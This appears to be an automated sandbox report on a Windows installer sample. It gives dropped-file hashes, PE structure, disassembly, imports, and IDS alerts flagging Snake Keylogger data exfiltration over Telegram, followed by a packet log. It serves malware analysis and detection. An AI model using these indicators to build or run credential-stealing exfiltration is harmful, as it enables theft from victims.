                                                                                                          Preview:..........P............+......................................................................................................................X......n..(................G...................................m.........|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................
                                                                                                          Process:C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):133874
                                                                                                          Entropy (8bit):4.594938586699607
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:cXgtolTNzmxBo22p1Nta/iRpGUg7DIvQcMMYMmXTIcsZNqsISj7/YsbcPG2:Xo5lyBn2n7a/a/Qc+XccAqsIKLpYPG2
                                                                                                          MD5:5923BC4D0B3B7D3F68DF0F14CA60DFFD
                                                                                                          SHA1:C55392EF6903DC24BC483FEF4FCE05BABCE62071
                                                                                                          SHA-256:8084F6513B0DC01F820EAE0A3BA41C311DCFA060B20963F52F834689ED9BBFD0
                                                                                                          SHA-512:B7B84D57AE1E9376D785CF9DF492DE069229A20987F2410031100AF15FDB1DE094492457D2AE1C22222B2F5466DA87C17664658CF729589D707A5100232B0687
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.....RR...sssss.........CCC.........y....................T................l..ee..ww.9.............................D....................o....v.$.....!.......................HHH.......7.........5.....N...>....................................z.A..88.........VVV.....))...D...................AA..............X..............r............%......bb...----....CCCCCC...........????..............II.....`..................NN...............E...................ZZ..II...........%..5........iii.....&......L.....mmm.l...~~~.......................hh....O..........Z.......1..............22..J........J.n.;;;;;...........]...;.......88....."".:..n....K......LL..N..HH............99......aaaaaaaaaa.A......DDD.v.]]]].X....@....""...............qqqq................++++.3...l........................................................................6..........zz.........K......................................G.]]...TTT..................ll..............SSSS......<..................O..E.........................333...
                                                                                                          Process:C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):362089
                                                                                                          Entropy (8bit):1.23992084267325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
                                                                                                          MD5:A4340182CDDD2EC1F1480360218343F9
                                                                                                          SHA1:50EF929FEA713AA6FCC05E8B75F497B7946B285B
                                                                                                          SHA-256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
                                                                                                          SHA-512:021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............
                                                                                                          Process:C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          File Type:FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
                                                                                                          Category:dropped
                                                                                                          Size (bytes):139354
                                                                                                          Entropy (8bit):1.2473328695625903
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
                                                                                                          MD5:B0FB6B583D6902DE58E1202D12BA4832
                                                                                                          SHA1:7F585B5C3A4581CE76E373C78A6513F157B20480
                                                                                                          SHA-256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
                                                                                                          SHA-512:E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
                                                                                                          Malicious:false
                                                                                                          Preview:.......................................|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........
                                                                                                          Process:C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:modified
                                                                                                          Size (bytes):12288
                                                                                                          Entropy (8bit):5.719859767584478
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                          MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                          SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                          SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                          SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: 2CQ2zMn0hb.exe, Detection: malicious, Browse
                                                                                                          • Filename: 6mGpn6kupm.exe, Detection: malicious, Browse
                                                                                                          • Filename: v4nrZtP7K2.exe, Detection: malicious, Browse
                                                                                                          • Filename: xXUnP7uCBJ.exe, Detection: malicious, Browse
                                                                                                          • Filename: 4UQ5wnI389.exe, Detection: malicious, Browse
                                                                                                          • Filename: ajRZflJ2ch.exe, Detection: malicious, Browse
                                                                                                          • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                          • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                          • Filename: KO0q4biYfC.exe, Detection: malicious, Browse
                                                                                                          • Filename: Yoranis Setup.exe, Detection: malicious, Browse
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1516414
                                                                                                          Entropy (8bit):5.403456852648461
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:9n342ffgFtdo3xX3y4bz2lWwWo6rSTZy0nnP:h42fotdoBXbz2luo6rS1y6
                                                                                                          MD5:57DCA1ADDA449DE459FE757167934070
                                                                                                          SHA1:36CE4EB4ECCF73375A0ED40494E7ECAA3F329BB4
                                                                                                          SHA-256:E6736EE318EEDD24140486B6EF0AE6269601D149891C0D6BA8B5A28E1428931B
                                                                                                          SHA-512:91469514DD981A741E4C5BF1C864C2683C0FA64FF85001E5A958FB7F9CCBBB82245159178E7E26218B509715DD0236DF6C3992A30FDE9273282B6B39751886A8
                                                                                                          Malicious:false
                                                                                                          Preview: 6......,.......,.......\........!.......4.......5..........................M...i............................H..............................................................................................................................................................................G...J...........z...h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Entropy (8bit):7.960085316194713
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:V7OHj6ISEo.exe
                                                                                                          File size:1'027'682 bytes
                                                                                                          MD5:44ca4d83095d7f0372c1eab439f633be
                                                                                                          SHA1:b90fdcf957fc294917a047608bb2188a1596e5e7
                                                                                                          SHA256:d7aca08687c1ffc0b01ad90f5500c968796bebf8b60995363c8d7c19be48c562
                                                                                                          SHA512:d81d6e6b625aae8bfce7a5972d6b5e41e101c330f1ca5221333d90013c1c1ded2cddede20aad64f61bb9e645068d28eeb256cceadb307bf49c3b284c98dd5ad3
                                                                                                          SSDEEP:24576:9jwKCNm+hbhARlNsfvUdQQIhf2cwCZLiSWfQOEy5Yx7tXv:V1CIMhKHdP3zCxHlhyqx7t/
                                                                                                          TLSH:E425334DC6E3DF07C696D136185967793E4A2E063A466BE33A906A3D3C70BC4D83C369
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....
                                                                                                          Icon Hash:46224e4c19391d03
                                                                                                          Entrypoint:0x4034a5
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                          Instruction
                                                                                                          sub esp, 000002D4h
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          push 00000020h
                                                                                                          pop edi
                                                                                                          xor ebx, ebx
                                                                                                          push 00008001h
                                                                                                          mov dword ptr [esp+14h], ebx
                                                                                                          mov dword ptr [esp+10h], 0040A230h
                                                                                                          mov dword ptr [esp+1Ch], ebx
                                                                                                          call dword ptr [004080ACh]
                                                                                                          call dword ptr [004080A8h]
                                                                                                          and eax, BFFFFFFFh
                                                                                                          cmp ax, 00000006h
                                                                                                          mov dword ptr [0042A24Ch], eax
                                                                                                          je 00007F47E93E5E13h
                                                                                                          push ebx
                                                                                                          call 00007F47E93E90DDh
                                                                                                          cmp eax, ebx
                                                                                                          je 00007F47E93E5E09h
                                                                                                          push 00000C00h
                                                                                                          call eax
                                                                                                          mov esi, 004082B0h
                                                                                                          push esi
                                                                                                          call 00007F47E93E9057h
                                                                                                          push esi
                                                                                                          call dword ptr [00408150h]
                                                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                                                          cmp byte ptr [esi], 00000000h
                                                                                                          jne 00007F47E93E5DECh
                                                                                                          push 0000000Ah
                                                                                                          call 00007F47E93E90B0h
                                                                                                          push 00000008h
                                                                                                          call 00007F47E93E90A9h
                                                                                                          push 00000006h
                                                                                                          mov dword ptr [0042A244h], eax
                                                                                                          call 00007F47E93E909Dh
                                                                                                          cmp eax, ebx
                                                                                                          je 00007F47E93E5E11h
                                                                                                          push 0000001Eh
                                                                                                          call eax
                                                                                                          test eax, eax
                                                                                                          je 00007F47E93E5E09h
                                                                                                          or byte ptr [0042A24Fh], 00000040h
                                                                                                          push ebp
                                                                                                          call dword ptr [00408044h]
                                                                                                          push ebx
                                                                                                          call dword ptr [004082A0h]
                                                                                                          mov dword ptr [0042A318h], eax
                                                                                                          push ebx
                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                          push 000002B4h
                                                                                                          push eax
                                                                                                          push ebx
                                                                                                          push 004216E8h
                                                                                                          call dword ptr [00408188h]
                                                                                                          push 0040A384h
                                                                                                          Programming Language:
                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                          RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                          RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                          RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                          RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                          RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                          RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                          RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                          RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                          RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                          RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                          RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                          RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                          RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                          RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                          RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                          RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                          RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                          RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                          RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                          RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                          RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                          DLLImport
                                                                                                          KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                          USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                          ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-10T22:14:14.112061+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749970142.250.186.110443TCP
                                                                                                          2025-01-10T22:14:19.480720+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749972132.226.8.16980TCP
                                                                                                          2025-01-10T22:14:26.293285+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749972132.226.8.16980TCP
                                                                                                          2025-01-10T22:14:26.939576+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749974149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:27.330649+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749974149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:29.027759+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749975132.226.8.16980TCP
                                                                                                          2025-01-10T22:14:29.645099+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749976149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:29.965995+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749976149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:31.526788+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749978149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:31.990956+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749978149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:33.519198+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749980149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:34.010413+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749980149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:35.617891+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749982149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:36.003361+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749982149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:37.526401+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749984149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:37.924010+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749984149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:39.700762+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749986149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:40.026689+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749986149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:41.487017+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749988149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:41.704936+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749988149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:43.191974+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749990149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:43.512462+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749990149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:45.015199+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749992149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:45.287305+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749992149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:46.782618+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749994149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:47.155119+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749994149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:48.952941+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749996149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:49.270756+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749996149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:50.762232+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749998149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:51.051763+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749998149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:52.879449+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750000149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:53.244640+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.750000149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:55.159692+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750002149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:55.523764+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.750002149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:57.061818+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750004149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:57.378573+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.750004149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:58.855354+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750006149.154.167.220443TCP
                                                                                                          2025-01-10T22:14:59.124615+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.750006149.154.167.220443TCP
                                                                                                          2025-01-10T22:15:00.706930+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.750008149.154.167.220443TCP
                                                                                                          2025-01-10T22:15:00.971800+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.750008149.154.167.220443TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 10, 2025 22:14:12.894433022 CET49970443192.168.2.7142.250.186.110
                                                                                                          Jan 10, 2025 22:14:12.894494057 CET44349970142.250.186.110192.168.2.7
                                                                                                          Jan 10, 2025 22:14:12.894587040 CET49970443192.168.2.7142.250.186.110
                                                                                                          Jan 10, 2025 22:14:12.905000925 CET49970443192.168.2.7142.250.186.110
                                                                                                          Jan 10, 2025 22:14:12.905019999 CET44349970142.250.186.110192.168.2.7
                                                                                                          Jan 10, 2025 22:14:13.571346998 CET44349970142.250.186.110192.168.2.7
                                                                                                          Jan 10, 2025 22:14:13.571487904 CET49970443192.168.2.7142.250.186.110
                                                                                                          Jan 10, 2025 22:14:13.572138071 CET44349970142.250.186.110192.168.2.7
                                                                                                          Jan 10, 2025 22:14:13.572215080 CET49970443192.168.2.7142.250.186.110
                                                                                                          Jan 10, 2025 22:14:13.808912992 CET49970443192.168.2.7142.250.186.110
                                                                                                          Jan 10, 2025 22:14:13.808952093 CET44349970142.250.186.110192.168.2.7
                                                                                                          Jan 10, 2025 22:14:13.809921026 CET44349970142.250.186.110192.168.2.7
                                                                                                          Jan 10, 2025 22:14:13.809993982 CET49970443192.168.2.7142.250.186.110
                                                                                                          Jan 10, 2025 22:14:13.814753056 CET49970443192.168.2.7142.250.186.110
                                                                                                          Jan 10, 2025 22:14:13.855333090 CET44349970142.250.186.110192.168.2.7
                                                                                                          Jan 10, 2025 22:14:14.112103939 CET44349970142.250.186.110192.168.2.7
                                                                                                          Jan 10, 2025 22:14:14.112181902 CET49970443192.168.2.7142.250.186.110
                                                                                                          Jan 10, 2025 22:14:14.112215996 CET44349970142.250.186.110192.168.2.7
                                                                                                          Jan 10, 2025 22:14:14.112253904 CET49970443192.168.2.7142.250.186.110
                                                                                                          Jan 10, 2025 22:14:14.112380981 CET49970443192.168.2.7142.250.186.110
                                                                                                          Jan 10, 2025 22:14:14.112451077 CET44349970142.250.186.110192.168.2.7
                                                                                                          Jan 10, 2025 22:14:14.112503052 CET49970443192.168.2.7142.250.186.110
                                                                                                          Jan 10, 2025 22:14:14.137974977 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:14.138015985 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:14.138072968 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:14.138463974 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:14.138473988 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:14.851581097 CET44349971142.250.185.65192.168.2.7
                                                                                                          Jan 10, 2025 22:14:14.851739883 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:14.856306076 CET49971443192.168.2.7142.250.185.65
                                                                                                          Jan 10, 2025 22:14:14.856312990 CET44349971142.250.185.65192.168.2.7
